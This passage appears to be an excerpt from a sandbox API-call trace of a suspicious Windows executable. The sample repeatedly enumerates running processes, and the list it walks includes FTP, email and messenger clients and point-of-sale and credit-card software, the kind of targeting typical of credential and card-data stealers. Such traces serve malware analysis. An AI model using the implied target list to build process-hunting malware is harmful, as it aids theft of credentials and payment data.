th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0303.974] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0303.976] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0303.978] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0303.982] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0303.984] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0303.986] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0304.002] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0304.004] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0304.006] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0304.008] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0304.009] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0304.014] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0304.017] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0304.018] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0304.021] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0304.022] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0304.024] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0304.032] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0304.034] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0304.036] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0304.038] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0304.040] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0304.159] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0304.161] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0304.162] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0304.164] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0304.166] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0304.175] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0304.177] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0304.179] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0304.181] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0304.186] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0304.188] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0304.190] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0304.192] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0304.193] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0304.195] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0304.197] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0304.204] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0304.298] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0304.300] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0304.302] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0304.304] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0304.305] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0304.307] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0304.312] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0304.314] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0304.316] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0304.319] CloseHandle (hObject=0x21f8) returned 1 [0304.319] Sleep (dwMilliseconds=0x64) [0304.379] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d4c [0304.391] Process32First (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.393] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0304.394] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0304.396] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0304.397] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0304.399] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0304.400] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0304.469] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0304.471] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0304.475] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.477] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.479] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0304.483] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.485] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.486] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.488] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.489] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.491] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.493] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.494] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0304.499] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0304.500] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0304.502] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.504] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0304.505] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0304.507] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0304.509] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0304.520] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0304.522] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.524] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0304.526] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0304.527] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0304.529] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0304.530] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) 